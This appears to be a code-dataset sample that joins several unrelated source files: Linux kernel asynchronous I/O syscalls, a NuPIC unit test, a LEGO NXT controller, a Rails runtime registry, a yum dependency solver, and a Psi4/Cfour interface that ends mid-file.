} /* else, POLLFREE has freed the waitqueue, so we must complete */
list_del_init(&iocb->ki_list);
iocb->ki_res.res = mangle_poll(mask);
spin_unlock_irq(&ctx->ctx_lock);
iocb_put(iocb);
}
/* assumes we are called with irqs disabled */
static int aio_poll_cancel(struct kiocb *iocb)
{
struct aio_kiocb *aiocb = container_of(iocb, struct aio_kiocb, rw);
struct poll_iocb *req = &aiocb->poll;
if (poll_iocb_lock_wq(req)) {
WRITE_ONCE(req->cancelled, true);
if (!req->work_scheduled) {
schedule_work(&aiocb->poll.work);
req->work_scheduled = true;
}
poll_iocb_unlock_wq(req);
} /* else, the request was force-cancelled by POLLFREE already */
return 0;
}
static int aio_poll_wake(struct wait_queue_entry *wait, unsigned mode, int sync,
void *key)
{
struct poll_iocb *req = container_of(wait, struct poll_iocb, wait);
struct aio_kiocb *iocb = container_of(req, struct aio_kiocb, poll);
__poll_t mask = key_to_poll(key);
unsigned long flags;
/* for instances that support it check for an event match first: */
if (mask && !(mask & req->events))
return 0;
/*
* Complete the request inline if possible. This requires that three
* conditions be met:
* 1. An event mask must have been passed. If a plain wakeup was done
* instead, then mask == 0 and we have to call vfs_poll() to get
* the events, so inline completion isn't possible.
* 2. The completion work must not have already been scheduled.
* 3. ctx_lock must not be busy. We have to use trylock because we
* already hold the waitqueue lock, so this inverts the normal
* locking order. Use irqsave/irqrestore because not all
* filesystems (e.g. fuse) call this function with IRQs disabled,
* yet IRQs have to be disabled before ctx_lock is obtained.
*/
if (mask && !req->work_scheduled &&
spin_trylock_irqsave(&iocb->ki_ctx->ctx_lock, flags)) {
struct kioctx *ctx = iocb->ki_ctx;
list_del_init(&req->wait.entry);
list_del(&iocb->ki_list);
iocb->ki_res.res = mangle_poll(mask);
if (iocb->ki_eventfd && !eventfd_signal_allowed()) {
iocb = NULL;
INIT_WORK(&req->work, aio_poll_put_work);
schedule_work(&req->work);
}
spin_unlock_irqrestore(&ctx->ctx_lock, flags);
if (iocb)
iocb_put(iocb);
} else {
/*
* Schedule the completion work if needed. If it was already
* scheduled, record that another wakeup came in.
*
* Don't remove the request from the waitqueue here, as it might
* not actually be complete yet (we won't know until vfs_poll()
* is called), and we must not miss any wakeups. POLLFREE is an
* exception to this; see below.
*/
if (req->work_scheduled) {
req->work_need_resched = true;
} else {
schedule_work(&req->work);
req->work_scheduled = true;
}
/*
* If the waitqueue is being freed early but we can't complete
* the request inline, we have to tear down the request as best
* we can. That means immediately removing the request from its
* waitqueue and preventing all further accesses to the
* waitqueue via the request. We also need to schedule the
* completion work (done above). Also mark the request as
* cancelled, to potentially skip an unneeded call to ->poll().
*/
if (mask & POLLFREE) {
WRITE_ONCE(req->cancelled, true);
list_del_init(&req->wait.entry);
/*
* Careful: this *must* be the last step, since as soon
* as req->head is NULL'ed out, the request can be
* completed and freed, since aio_poll_complete_work()
* will no longer need to take the waitqueue lock.
*/
smp_store_release(&req->head, NULL);
}
}
return 1;
}
struct aio_poll_table {
struct poll_table_struct pt;
struct aio_kiocb *iocb;
bool queued;
int error;
};
static void
aio_poll_queue_proc(struct file *file, struct wait_queue_head *head,
struct poll_table_struct *p)
{
struct aio_poll_table *pt = container_of(p, struct aio_poll_table, pt);
/* multiple wait queues per file are not supported */
if (unlikely(pt->queued)) {
pt->error = -EINVAL;
return;
}
pt->queued = true;
pt->error = 0;
pt->iocb->poll.head = head;
add_wait_queue(head, &pt->iocb->poll.wait);
}
static int aio_poll(struct aio_kiocb *aiocb, const struct iocb *iocb)
{
struct kioctx *ctx = aiocb->ki_ctx;
struct poll_iocb *req = &aiocb->poll;
struct aio_poll_table apt;
bool cancel = false;
__poll_t mask;
/* reject any unknown events outside the normal event mask. */
if ((u16)iocb->aio_buf != iocb->aio_buf)
return -EINVAL;
/* reject fields that are not defined for poll */
if (iocb->aio_offset || iocb->aio_nbytes || iocb->aio_rw_flags)
return -EINVAL;
INIT_WORK(&req->work, aio_poll_complete_work);
req->events = demangle_poll(iocb->aio_buf) | EPOLLERR | EPOLLHUP;
req->head = NULL;
req->cancelled = false;
req->work_scheduled = false;
req->work_need_resched = false;
apt.pt._qproc = aio_poll_queue_proc;
apt.pt._key = req->events;
apt.iocb = aiocb;
apt.queued = false;
apt.error = -EINVAL; /* same as no support for IOCB_CMD_POLL */
/* initialized the list so that we can do list_empty checks */
INIT_LIST_HEAD(&req->wait.entry);
init_waitqueue_func_entry(&req->wait, aio_poll_wake);
mask = vfs_poll(req->file, &apt.pt) & req->events;
spin_lock_irq(&ctx->ctx_lock);
if (likely(apt.queued)) {
bool on_queue = poll_iocb_lock_wq(req);
if (!on_queue || req->work_scheduled) {
/*
* aio_poll_wake() already either scheduled the async
* completion work, or completed the request inline.
*/
if (apt.error) /* unsupported case: multiple queues */
cancel = true;
apt.error = 0;
mask = 0;
}
if (mask || apt.error) {
/* Steal to complete synchronously. */
list_del_init(&req->wait.entry);
} else if (cancel) {
/* Cancel if possible (may be too late though). */
WRITE_ONCE(req->cancelled, true);
} else if (on_queue) {
/*
* Actually waiting for an event, so add the request to
* active_reqs so that it can be cancelled if needed.
*/
list_add_tail(&aiocb->ki_list, &ctx->active_reqs);
aiocb->ki_cancel = aio_poll_cancel;
}
if (on_queue)
poll_iocb_unlock_wq(req);
}
if (mask) { /* no async, we'd stolen it */
aiocb->ki_res.res = mangle_poll(mask);
apt.error = 0;
}
spin_unlock_irq(&ctx->ctx_lock);
if (mask)
iocb_put(aiocb);
return apt.error;
}
static int __io_submit_one(struct kioctx *ctx, const struct iocb *iocb,
struct iocb __user *user_iocb, struct aio_kiocb *req,
bool compat)
{
req->ki_filp = fget(iocb->aio_fildes);
if (unlikely(!req->ki_filp))
return -EBADF;
if (iocb->aio_flags & IOCB_FLAG_RESFD) {
struct eventfd_ctx *eventfd;
/*
* If the IOCB_FLAG_RESFD flag of aio_flags is set, get an
* instance of the file* now. The file descriptor must be
* an eventfd() fd, and will be signaled for each completed
* event using the eventfd_signal() function.
*/
eventfd = eventfd_ctx_fdget(iocb->aio_resfd);
if (IS_ERR(eventfd))
return PTR_ERR(eventfd);
req->ki_eventfd = eventfd;
}
if (unlikely(put_user(KIOCB_KEY, &user_iocb->aio_key))) {
pr_debug("EFAULT: aio_key\n");
return -EFAULT;
}
req->ki_res.obj = (u64)(unsigned long)user_iocb;
req->ki_res.data = iocb->aio_data;
req->ki_res.res = 0;
req->ki_res.res2 = 0;
switch (iocb->aio_lio_opcode) {
case IOCB_CMD_PREAD:
return aio_read(&req->rw, iocb, false, compat);
case IOCB_CMD_PWRITE:
return aio_write(&req->rw, iocb, false, compat);
case IOCB_CMD_PREADV:
return aio_read(&req->rw, iocb, true, compat);
case IOCB_CMD_PWRITEV:
return aio_write(&req->rw, iocb, true, compat);
case IOCB_CMD_FSYNC:
return aio_fsync(&req->fsync, iocb, false);
case IOCB_CMD_FDSYNC:
return aio_fsync(&req->fsync, iocb, true);
case IOCB_CMD_POLL:
return aio_poll(req, iocb);
default:
pr_debug("invalid aio operation %d\n", iocb->aio_lio_opcode);
return -EINVAL;
}
}
static int io_submit_one(struct kioctx *ctx, struct iocb __user *user_iocb,
bool compat)
{
struct aio_kiocb *req;
struct iocb iocb;
int err;
if (unlikely(copy_from_user(&iocb, user_iocb, sizeof(iocb))))
return -EFAULT;
/* enforce forwards compatibility on users */
if (unlikely(iocb.aio_reserved2)) {
pr_debug("EINVAL: reserve field set\n");
return -EINVAL;
}
/* prevent overflows */
if (unlikely(
(iocb.aio_buf != (unsigned long)iocb.aio_buf) ||
(iocb.aio_nbytes != (size_t)iocb.aio_nbytes) ||
((ssize_t)iocb.aio_nbytes < 0)
)) {
pr_debug("EINVAL: overflow check\n");
return -EINVAL;
}
req = aio_get_req(ctx);
if (unlikely(!req))
return -EAGAIN;
err = __io_submit_one(ctx, &iocb, user_iocb, req, compat);
/* Done with the synchronous reference */
iocb_put(req);
/*
* If err is 0, we'd either done aio_complete() ourselves or have
* arranged for that to be done asynchronously. Anything non-zero
* means that we need to destroy req ourselves.
*/
if (unlikely(err)) {
iocb_destroy(req);
put_reqs_available(ctx, 1);
}
return err;
}
/* sys_io_submit:
* Queue the nr iocbs pointed to by iocbpp for processing. Returns
* the number of iocbs queued. May return -EINVAL if the aio_context
* specified by ctx_id is invalid, if nr is < 0, if the iocb at
* *iocbpp[0] is not properly initialized, if the operation specified
* is invalid for the file descriptor in the iocb. May fail with
* -EFAULT if any of the data structures point to invalid data. May
* fail with -EBADF if the file descriptor specified in the first
* iocb is invalid. May fail with -EAGAIN if insufficient resources
* are available to queue any iocbs. Will return 0 if nr is 0. Will
* fail with -ENOSYS if not implemented.
*/
SYSCALL_DEFINE3(io_submit, aio_context_t, ctx_id, long, nr,
struct iocb __user * __user *, iocbpp)
{
struct kioctx *ctx;
long ret = 0;
int i = 0;
struct blk_plug plug;
if (unlikely(nr < 0))
return -EINVAL;
ctx = lookup_ioctx(ctx_id);
if (unlikely(!ctx)) {
pr_debug("EINVAL: invalid context id\n");
return -EINVAL;
}
if (nr > ctx->nr_events)
nr = ctx->nr_events;
if (nr > AIO_PLUG_THRESHOLD)
blk_start_plug(&plug);
for (i = 0; i < nr; i++) {
struct iocb __user *user_iocb;
if (unlikely(get_user(user_iocb, iocbpp + i))) {
ret = -EFAULT;
break;
}
ret = io_submit_one(ctx, user_iocb, false);
if (ret)
break;
}
if (nr > AIO_PLUG_THRESHOLD)
blk_finish_plug(&plug);
percpu_ref_put(&ctx->users);
return i ? i : ret;
}
#ifdef CONFIG_COMPAT
COMPAT_SYSCALL_DEFINE3(io_submit, compat_aio_context_t, ctx_id,
int, nr, compat_uptr_t __user *, iocbpp)
{
struct kioctx *ctx;
long ret = 0;
int i = 0;
struct blk_plug plug;
if (unlikely(nr < 0))
return -EINVAL;
ctx = lookup_ioctx(ctx_id);
if (unlikely(!ctx)) {
pr_debug("EINVAL: invalid context id\n");
return -EINVAL;
}
if (nr > ctx->nr_events)
nr = ctx->nr_events;
if (nr > AIO_PLUG_THRESHOLD)
blk_start_plug(&plug);
for (i = 0; i < nr; i++) {
compat_uptr_t user_iocb;
if (unlikely(get_user(user_iocb, iocbpp + i))) {
ret = -EFAULT;
break;
}
ret = io_submit_one(ctx, compat_ptr(user_iocb), true);
if (ret)
break;
}
if (nr > AIO_PLUG_THRESHOLD)
blk_finish_plug(&plug);
percpu_ref_put(&ctx->users);
return i ? i : ret;
}
#endif
/* sys_io_cancel:
* Attempts to cancel an iocb previously passed to io_submit. If
* the operation is successfully cancelled, the resulting event is
* copied into the memory pointed to by result without being placed
* into the completion queue and 0 is returned. May fail with
* -EFAULT if any of the data structures pointed to are invalid.
* May fail with -EINVAL if aio_context specified by ctx_id is
* invalid. May fail with -EAGAIN if the iocb specified was not
* cancelled. Will fail with -ENOSYS if not implemented.
*/
SYSCALL_DEFINE3(io_cancel, aio_context_t, ctx_id, struct iocb __user *, iocb,
struct io_event __user *, result)
{
struct kioctx *ctx;
struct aio_kiocb *kiocb;
int ret = -EINVAL;
u32 key;
u64 obj = (u64)(unsigned long)iocb;
if (unlikely(get_user(key, &iocb->aio_key)))
return -EFAULT;
if (unlikely(key != KIOCB_KEY))
return -EINVAL;
ctx = lookup_ioctx(ctx_id);
if (unlikely(!ctx))
return -EINVAL;
spin_lock_irq(&ctx->ctx_lock);
list_for_each_entry(kiocb, &ctx->active_reqs, ki_list) {
if (kiocb->ki_res.obj == obj) {
ret = kiocb->ki_cancel(&kiocb->rw);
list_del_init(&kiocb->ki_list);
break;
}
}
spin_unlock_irq(&ctx->ctx_lock);
if (!ret) {
/*
* The result argument is no longer used - the io_event is
* always delivered via the ring buffer. -EINPROGRESS indicates
* cancellation is progress:
*/
ret = -EINPROGRESS;
}
percpu_ref_put(&ctx->users);
return ret;
}
static long do_io_getevents(aio_context_t ctx_id,
long min_nr,
long nr,
struct io_event __user *events,
struct timespec64 *ts)
{
ktime_t until = ts ? timespec64_to_ktime(*ts) : KTIME_MAX;
struct kioctx *ioctx = lookup_ioctx(ctx_id);
long ret = -EINVAL;
if (likely(ioctx)) {
if (likely(min_nr <= nr && min_nr >= 0))
ret = read_events(ioctx, min_nr, nr, events, until);
percpu_ref_put(&ioctx->users);
}
return ret;
}
/* io_getevents:
* Attempts to read at least min_nr events and up to nr events from
* the completion queue for the aio_context specified by ctx_id. If
* it succeeds, the number of read events is returned. May fail with
* -EINVAL if ctx_id is invalid, if min_nr is out of range, if nr is
* out of range, if timeout is out of range. May fail with -EFAULT
* if any of the memory specified is invalid. May return 0 or
* < min_nr if the timeout specified by timeout has elapsed
* before sufficient events are available, where timeout == NULL
* specifies an infinite timeout. Note that the timeout pointed to by
* timeout is relative. Will fail with -ENOSYS if not implemented.
*/
#ifdef CONFIG_64BIT
SYSCALL_DEFINE5(io_getevents, aio_context_t, ctx_id,
long, min_nr,
long, nr,
struct io_event __user *, events,
struct __kernel_timespec __user *, timeout)
{
struct timespec64 ts;
int ret;
if (timeout && unlikely(get_timespec64(&ts, timeout)))
return -EFAULT;
ret = do_io_getevents(ctx_id, min_nr, nr, events, timeout ? &ts : NULL);
if (!ret && signal_pending(current))
ret = -EINTR;
return ret;
}
#endif
struct __aio_sigset {
const sigset_t __user *sigmask;
size_t sigsetsize;
};
SYSCALL_DEFINE6(io_pgetevents,
aio_context_t, ctx_id,
long, min_nr,
long, nr,
struct io_event __user *, events,
struct __kernel_timespec __user *, timeout,
const struct __aio_sigset __user *, usig)
{
struct __aio_sigset ksig = { NULL, };
struct timespec64 ts;
bool interrupted;
int ret;
if (timeout && unlikely(get_timespec64(&ts, timeout)))
return -EFAULT;
if (usig && copy_from_user(&ksig, usig, sizeof(ksig)))
return -EFAULT;
ret = set_user_sigmask(ksig.sigmask, ksig.sigsetsize);
if (ret)
return ret;
ret = do_io_getevents(ctx_id, min_nr, nr, events, timeout ? &ts : NULL);
interrupted = signal_pending(current);
restore_saved_sigmask_unless(interrupted);
if (interrupted && !ret)
ret = -ERESTARTNOHAND;
return ret;
}
#if defined(CONFIG_COMPAT_32BIT_TIME) && !defined(CONFIG_64BIT)
SYSCALL_DEFINE6(io_pgetevents_time32,
aio_context_t, ctx_id,
long, min_nr,
long, nr,
struct io_event __user *, events,
struct old_timespec32 __user *, timeout,
const struct __aio_sigset __user *, usig)
{
struct __aio_sigset ksig = { NULL, };
struct timespec64 ts;
bool interrupted;
int ret;
if (timeout && unlikely(get_old_timespec32(&ts, timeout)))
return -EFAULT;
if (usig && copy_from_user(&ksig, usig, sizeof(ksig)))
return -EFAULT;
ret = set_user_sigmask(ksig.sigmask, ksig.sigsetsize);
if (ret)
return ret;
ret = do_io_getevents(ctx_id, min_nr, nr, events, timeout ? &ts : NULL);
interrupted = signal_pending(current);
restore_saved_sigmask_unless(interrupted);
if (interrupted && !ret)
ret = -ERESTARTNOHAND;
return ret;
}
#endif
#if defined(CONFIG_COMPAT_32BIT_TIME)
SYSCALL_DEFINE5(io_getevents_time32, __u32, ctx_id,
__s32, min_nr,
__s32, nr,
struct io_event __user *, events,
struct old_timespec32 __user *, timeout)
{
struct timespec64 t;
int ret;
if (timeout && get_old_timespec32(&t, timeout))
return -EFAULT;
ret = do_io_getevents(ctx_id, min_nr, nr, events, timeout ? &t : NULL);
if (!ret && signal_pending(current))
ret = -EINTR;
return ret;
}
#endif
#ifdef CONFIG_COMPAT
struct __compat_aio_sigset {
compat_uptr_t sigmask;
compat_size_t sigsetsize;
};
#if defined(CONFIG_COMPAT_32BIT_TIME)
COMPAT_SYSCALL_DEFINE6(io_pgetevents,
compat_aio_context_t, ctx_id,
compat_long_t, min_nr,
compat_long_t, nr,
struct io_event __user *, events,
struct old_timespec32 __user *, timeout,
const struct __compat_aio_sigset __user *, usig)
{
struct __compat_aio_sigset ksig = { 0, };
struct timespec64 t;
bool interrupted;
int ret;
if (timeout && get_old_timespec32(&t, timeout))
return -EFAULT;
if (usig && copy_from_user(&ksig, usig, sizeof(ksig)))
return -EFAULT;
ret = set_compat_user_sigmask(compat_ptr(ksig.sigmask), ksig.sigsetsize);
if (ret)
return ret;
ret = do_io_getevents(ctx_id, min_nr, nr, events, timeout ? &t : NULL);
interrupted = signal_pending(current);
restore_saved_sigmask_unless(interrupted);
if (interrupted && !ret)
ret = -ERESTARTNOHAND;
return ret;
}
#endif
COMPAT_SYSCALL_DEFINE6(io_pgetevents_time64,
compat_aio_context_t, ctx_id,
compat_long_t, min_nr,
compat_long_t, nr,
struct io_event __user *, events,
struct __kernel_timespec __user *, timeout,
const struct __compat_aio_sigset __user *, usig)
{
struct __compat_aio_sigset ksig = { 0, };
struct timespec64 t;
bool interrupted;
int ret;
if (timeout && get_timespec64(&t, timeout))
return -EFAULT;
if (usig && copy_from_user(&ksig, usig, sizeof(ksig)))
return -EFAULT;
ret = set_compat_user_sigmask(compat_ptr(ksig.sigmask), ksig.sigsetsize);
if (ret)
return ret;
ret = do_io_getevents(ctx_id, min_nr, nr, events, timeout ? &t : NULL);
interrupted = signal_pending(current);
restore_saved_sigmask_unless(interrupted);
if (interrupted && !ret)
ret = -ERESTARTNOHAND;
return ret;
}
#endif | c | github | https://github.com/torvalds/linux | fs/aio.c |
#!/usr/bin/env python
# ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2013, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
"""Unit tests for aggregator module."""
import unittest2 as unittest
from nupic.data import aggregator
class AggregatorTest(unittest.TestCase):
"""Unit tests for misc. aggregator functions."""
def testFixAggregationDict(self):
# Simplest case.
result = aggregator._aggr_weighted_mean((1.0, 1.0), (1, 1))
self.assertAlmostEqual(result, 1.0, places=7)
# Simple non-uniform case.
result = aggregator._aggr_weighted_mean((1.0, 2.0), (1, 2))
self.assertAlmostEqual(result, 5.0/3.0, places=7)
# Make sure it handles integer values as integers.
result = aggregator._aggr_weighted_mean((1, 2), (1, 2))
self.assertAlmostEqual(result, 1, places=7)
# More-than-two case.
result = aggregator._aggr_weighted_mean((1.0, 2.0, 3.0), (1, 2, 3))
self.assertAlmostEqual(result, 14.0/6.0, places=7)
# Handle zeros.
result = aggregator._aggr_weighted_mean((1.0, 0.0, 3.0), (1, 2, 3))
self.assertAlmostEqual(result, 10.0/6.0, places=7)
# Handle negative numbers.
result = aggregator._aggr_weighted_mean((1.0, -2.0, 3.0), (1, 2, 3))
self.assertAlmostEqual(result, 1.0, places=7)
if __name__ == '__main__':
unittest.main() | unknown | codeparrot/codeparrot-clean | ||
import lightblue
from nxt import Motor, find_one_brick, PORT_A, PORT_B, PORT_C, PORT_1, PORT_2, PORT_3, PORT_4
from nxt.sensor import Touch, Sound, Ultrasonic, Light
from time import sleep
class PortMap(dict):
def __init__(self, ports, factory):
self.factory = factory
self.ports = ports
def __missing__(self, port):
if port in self.ports:
self[port] = self.factory(port)
return self[port]
else:
raise ValueError("{} is an invalid port; must be one of {}".format(
port, ", ".join(self.ports)))
class NXTBrick():
motorPorts = {
"a": PORT_A,
"b": PORT_B,
"c": PORT_C
}
sensorPorts = {
1: PORT_1,
2: PORT_2,
3: PORT_3,
4: PORT_4
}
sensorTypes = {
"none" : None,
"touch" : Touch,
"sound" : Sound,
"ultrasonic" : Ultrasonic,
"light" : Light
}
def __init__(self):
self.brick = find_one_brick()
self.motors = PortMap(self.motorPorts.keys(), self._motor_factory())
self.sensors = {}
def roll(self, port, power):
self.motors[port].run(max(-100, min(100, power)))
def halt(self, port):
self.motors[port].brake()
sleep(0.2)
self.motors[port].idle()
def read_sensor(self, port):
if port in self.sensors.keys():
return int(self.sensors[port].get_sample())
else:
return "None"
def read_sensors(self):
return {i: self.read_sensor(i) for i in self.sensorPorts.keys()}
def _motor_factory(self):
def create_motor(port):
return Motor(self.brick, self.motorPorts[port])
return create_motor
def add_sensor(self, port, sensorType):
if port in self.sensorPorts.keys() and sensorType in self.sensorTypes:
if sensorType == 'none':
del self.sensors[port]
else:
self.sensors[port] = self.sensorTypes[sensorType](
self.brick, self.sensorPorts[port])
if sensorType == 'light':
self.sensors[port].set_illuminated(True)
else:
if port not in self.sensorPorts.keys():
raise ValueError("{} is an invalid sensor port; must be in {}".format(
port, ", ".join(map(str, self.sensorPorts.keys()))))
else:
raise ValueError("{} is an invalid sensor type; must be in {}".format(
sensorType, ", ".join(self.sensorTypes)))
def remove_sensor(self, port):
self.add_sensor(port, 'none') | unknown | codeparrot/codeparrot-clean | ||
# frozen_string_literal: true
module ActiveRecord
# This is a thread locals registry for Active Record. For example:
#
# ActiveRecord::RuntimeRegistry.stats.sql_runtime
#
# returns the connection handler local to the current unit of execution (either thread of fiber).
module RuntimeRegistry # :nodoc:
class Stats
attr_accessor :sql_runtime, :async_sql_runtime, :queries_count, :cached_queries_count
def initialize
@sql_runtime = 0.0
@async_sql_runtime = 0.0
@queries_count = 0
@cached_queries_count = 0
end
def reset_runtimes
sql_runtime_was = @sql_runtime
@sql_runtime = 0.0
@async_sql_runtime = 0.0
sql_runtime_was
end
public alias_method :reset, :initialize
end
extend self
def call(name, start, finish, id, payload)
record(
payload[:name],
(finish - start) * 1_000.0,
cached: payload[:cached],
async: payload[:async],
lock_wait: payload[:lock_wait],
)
end
def record(query_name, runtime, cached: false, async: false, lock_wait: nil)
stats = self.stats
unless query_name == "TRANSACTION" || query_name == "SCHEMA"
stats.queries_count += 1
stats.cached_queries_count += 1 if cached
end
if async
stats.async_sql_runtime += (runtime - lock_wait)
end
stats.sql_runtime += runtime
end
def stats
ActiveSupport::IsolatedExecutionState[:active_record_runtime] ||= Stats.new
end
def reset
stats.reset
end
end
end
ActiveSupport::Notifications.monotonic_subscribe("sql.active_record", ActiveRecord::RuntimeRegistry) | ruby | github | https://github.com/rails/rails | activerecord/lib/active_record/runtime_registry.rb |
#!/usr/bin/python
#
# -*- coding: utf-8 -*-
#
# Copyright (c) 2012--2015 Red Hat, Inc.
#
# Lookup package dependencies in a yum repository
#
# This software is licensed to you under the GNU General Public License,
# version 2 (GPLv2). There is NO WARRANTY for this software, express or
# implied, including the implied warranties of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. You should have received a copy of GPLv2
# along with this software; if not, see
# http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt.
#
# Red Hat trademarks are not licensed under GPLv2. No permission is
# granted to use or replicate Red Hat trademarks that are incorporated
# in this software or its documentation
import logging
import re
import shutil
import sys
import yum
from yum.misc import prco_tuple_to_string
from yum.packageSack import ListPackageSack
from yum.packages import parsePackages
from yum.repos import RepoStorage
try:
from spacewalk.satellite_tools.progress_bar import ProgressBar
except ImportError:
# pylint: disable=F0401
_LIBPATH = "/usr/share/rhn"
if _LIBPATH not in sys.path:
sys.path.append(_LIBPATH)
from satellite_tools.progress_bar import ProgressBar
log = logging.getLogger(__name__)
CACHE_DIR = "/tmp/cache/yum"
PERSIST_DIR = "/var/lib/yum"
class DepSolver:
def __init__(self, repos, pkgs_in=None):
self.pkgs = pkgs_in or []
self.repos = repos
self._repostore = RepoStorage(self)
self.cleanup() # call cleanup before and after, to ensure no stale metadata
self.setup()
self.loadPackages()
self.yrepo = None
def setPackages(self, pkgs_in):
self.pkgs = pkgs_in
def setup(self):
"""
Load the repos into repostore to query package dependencies
"""
for repo in self.repos:
self.yrepo = yum.yumRepo.YumRepository(repo['id'])
self.yrepo.baseurl = ["file://%s/" % str(repo['relative_path'])]
self.yrepo.basecachedir = CACHE_DIR
self.yrepo.base_persistdir = PERSIST_DIR
self._repostore.add(self.yrepo)
def loadPackages(self):
"""
populate the repostore with packages
"""
# pylint: disable=W0212
self._repostore._setup = True
self._repostore.populateSack(which='all')
def cleanup(self):
"""
clean up the repo metadata cache from /tmp/cache/yum
"""
for repo in self._repostore.repos:
cachedir = "%s/%s" % (CACHE_DIR, repo)
try:
shutil.rmtree(cachedir)
except IOError:
pass
def getDependencylist(self):
"""
Get dependency list and suggested packages for package names provided.
The dependency lookup is only one level in this case.
The package name format could be any of the following:
name, name.arch, name-ver-rel.arch, name-ver, name-ver-rel,
epoch:name-ver-rel.arch, name-epoch:ver-rel.arch
"""
ematch, match, _unmatch = parsePackages(self._repostore.pkgSack, self.pkgs)
pkgs = []
for po in ematch + match:
pkgs.append(po)
results = self.__locateDeps(pkgs)
return results
def getRecursiveDepList(self):
"""
Get dependency list and suggested packages for package names provided.
The dependency lookup is recursive. All available packages in the repo
are returned matching whatprovides.
The package name format could be any of the following:
name, name.arch, name-ver-rel.arch, name-ver, name-ver-rel,
epoch:name-ver-rel.arch, name-epoch:ver-rel.arch
returns a dictionary of {'n-v-r.a' : [n,v,e,r,a],...}
"""
solved = []
to_solve = self.pkgs
all_results = {}
while to_solve:
log.debug("Solving %s \n\n", to_solve)
results = self.getDependencylist()
all_results.update(results)
found = self.processResults(results)[0]
solved += to_solve
to_solve = []
for _dep, pkgs in found.items():
for pkg in pkgs:
name, version, _epoch, release, arch = pkg
ndep = "%s-%s-%s.%s" % (name, version, release, arch)
solved = list(set(solved))
if ndep not in solved:
to_solve.append(ndep)
self.pkgs = to_solve
return all_results
def __locateDeps(self, pkgs):
results = {}
regex_filename_match = re.compile(r'[/*?]|\[[^]]*/[^]]*\]').match
print("Solving Dependencies (%i): " % len(pkgs))
pb = ProgressBar(prompt='', endTag=' - complete',
finalSize=len(pkgs), finalBarLength=40, stream=sys.stdout)
pb.printAll(1)
for pkg in pkgs:
pb.addTo(1)
pb.printIncrement()
results[pkg] = {}
reqs = pkg.requires
reqs.sort()
pkgresults = results[pkg]
for req in reqs:
(r, f, v) = req
if r.startswith('rpmlib('):
continue
satisfiers = []
for po in self.__whatProvides(r, f, v):
# verify this po indeed provides the dep,
# el5 version could give some false positives
if regex_filename_match(r) or \
po.checkPrco('provides', (r, f, v)):
satisfiers.append(po)
pkgresults[req] = satisfiers
pb.printComplete()
return results
def __whatProvides(self, name, flags, version):
# pylint: disable=W0702
try:
return ListPackageSack(self._repostore.pkgSack.searchProvides((name, flags, version)))
except:
#perhaps we're on older version of yum try old style
return ListPackageSack(self._repostore.pkgSack.searchProvides(name))
@staticmethod
def processResults(results):
reqlist = {}
notfound = {}
for pkg in results:
if len(results[pkg]) == 0:
continue
for req in results[pkg]:
rlist = results[pkg][req]
if not rlist:
# Unsatisfied dependency
notfound[prco_tuple_to_string(req)] = []
continue
reqlist[prco_tuple_to_string(req)] = rlist
found = {}
for req, rlist in reqlist.items():
found[req] = []
for r in rlist:
dep = [r.name, r.version, r.epoch, r.release, r.arch]
if dep not in found[req]:
found[req].append(dep)
return found, notfound
@staticmethod
def printable_result(results):
print_doc_str = ""
for pkg in results:
if len(results[pkg]) == 0:
continue
for req in results[pkg]:
rlist = results[pkg][req]
print_doc_str += "\n dependency: %s \n" % prco_tuple_to_string(req)
if not rlist:
# Unsatisfied dependency
print_doc_str += " Unsatisfied dependency \n"
continue
for po in rlist:
print_doc_str += " provider: %s\n" % po.compactPrint()
return print_doc_str
if __name__ == '__main__':
if len(sys.argv) < 3:
print "USAGE: python depsolver.py <repoid> <repodata_path> <pkgname1> <pkgname2> ....<pkgnameN>"
sys.exit(0)
arg_repo = {'id': sys.argv[1],
'relative_path': sys.argv[2], } # path to where repodata is located
arg_pkgs = sys.argv[3:]
dsolve = DepSolver([arg_repo], arg_pkgs)
deplist = dsolve.getDependencylist()
result_set = dsolve.processResults(deplist)
print result_set
print "Printable dependency Results: \n\n %s" % dsolve.printable_result(deplist) | unknown | codeparrot/codeparrot-clean | ||
#
# @BEGIN LICENSE
#
# Psi4: an open-source quantum chemistry software package
#
# Copyright (c) 2007-2019 The Psi4 Developers.
#
# The copyrights for code used from other parties are included in
# the corresponding files.
#
# This file is part of Psi4.
#
# Psi4 is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, version 3.
#
# Psi4 is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License along
# with Psi4; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# @END LICENSE
#
"""Module with functions for Psi4/Cfour interface. Portions that require
calls to Boost Python psi4 module are here, otherwise in qcdb module.
Also calls to qcdb module are here and not elsewhere in driver.
Organizationally, this module isolates qcdb code from psi4 code.
"""
import os
import re
import glob
import shelve
import shutil
import difflib
import datetime
import subprocess
from psi4.driver.p4util.exceptions import *
def run_cfour_module(xmod):
# Find environment by merging PSIPATH and PATH environment variables
lenv = {
'PATH': ':'.join([os.path.abspath(x) for x in os.environ.get('PSIPATH', '').split(':') if x != '']) + \
':' + os.environ.get('PATH') + \
':' + core.get_datadir() + '/basis' + \
':' + core.psi_top_srcdir() + '/share/basis',
'CFOUR_NUM_CORES': os.environ.get('CFOUR_NUM_CORES'),
'LD_LIBRARY_PATH': os.environ.get('LD_LIBRARY_PATH')
}
# Filter out None values as subprocess will fault on them
lenv = {k: v for k, v in lenv.items() if v is not None}
# Call executable xcfour, directing cfour output to the psi4 output file
try:
retcode = subprocess.Popen([xmod], bufsize=0, stdout=subprocess.PIPE, env=lenv)
except OSError as e:
